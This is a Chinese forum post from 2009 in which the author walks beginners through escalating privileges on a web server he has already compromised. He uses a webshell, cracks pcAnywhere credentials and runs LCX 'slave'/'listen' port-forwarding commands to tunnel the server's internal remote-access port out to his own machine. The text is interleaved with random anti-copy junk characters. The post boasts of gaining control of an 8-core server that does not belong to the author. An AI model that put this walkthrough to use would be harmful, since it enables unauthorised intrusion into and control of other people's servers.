|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。$ S* \# l0 m1 M- r3 n% H" c
4 [, y0 {' b' P1 S( }$ a! ?2 a
提权方法:pcanywhere+LCX: o' l6 L# \% M$ t" G0 j
6 r9 Y: k9 V( Y: E! g$ q
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。 n- O+ D5 ~ o# K
+ G5 W+ ~/ e& Q0 B
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。9 [4 |- W% u, ]1 t9 q" u
+ g3 q3 \, [/ H
& H, G; a+ o" S& H查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
# M$ g" b) B7 m7 T3 \/ W5 P8 E. k( p0 F- Z' j: r) @
* i3 N. X% V* S Y2 _5 D8 M呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。" ~# \) u) r. Q
7 y4 Q+ t/ M a- l
' F$ @0 i( l/ F6 t5 z/ \% t/ U! B& p; {
# o/ h" U- I1 y$ ?' z由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
" K5 ]+ c- r' r. k' p; K1 F4 Z% N/ B5 X/ w! ]0 C
- M; ^ b$ I$ V: V' }3 \/ j, A
LCX的用法再简单说下:% J6 w/ c0 L! C; u9 X3 ]1 N
: f) o2 f( g' m服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口); M( v0 V. c- w3 Y6 |# s
) y) p4 `* R2 {6 M0 S4 \1 [本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)2 [/ \% V" v9 m9 \- S4 c' j7 @
5 n; S8 I8 E, _( Q! v9 \) P0 k
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。 k/ o4 X/ @: O' w/ g/ V: N
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``7 H6 k- J3 N3 d, t
! _- L: e/ q% u: k; K, l+ U3 x
$ I4 h, u$ t0 j+ P1 ? |+ ^ K# d w W [$ d+ S
8 d5 Z) m$ n9 r呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。# o8 F5 o% g4 @9 L2 Y% `% Q4 X- F$ d
( ^& V% a8 M2 s Z8 B0 z" i ?
) V a) r" C8 E4 F
! o7 t! s$ F$ {$ Z
" u) |% d. d7 A) G- B4 V6 Z ?( T我们本地连接试试,输入我们刚破解的账号密码
/ g3 O+ J: r9 O3 t& B, m4 |& `0 y, v7 u% i
4 X6 P6 V& z) [' }8 e1 ]/ i5 m1 l' @6 @呵呵``连接成功,服务器不错,又一个8核^︵^8 M& }; a+ P s8 K
' {, z+ W) |1 D: K5 y2 Q- P ?6 |" E2 g! N
5 q- J% k% u/ t2 D |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
.gif)
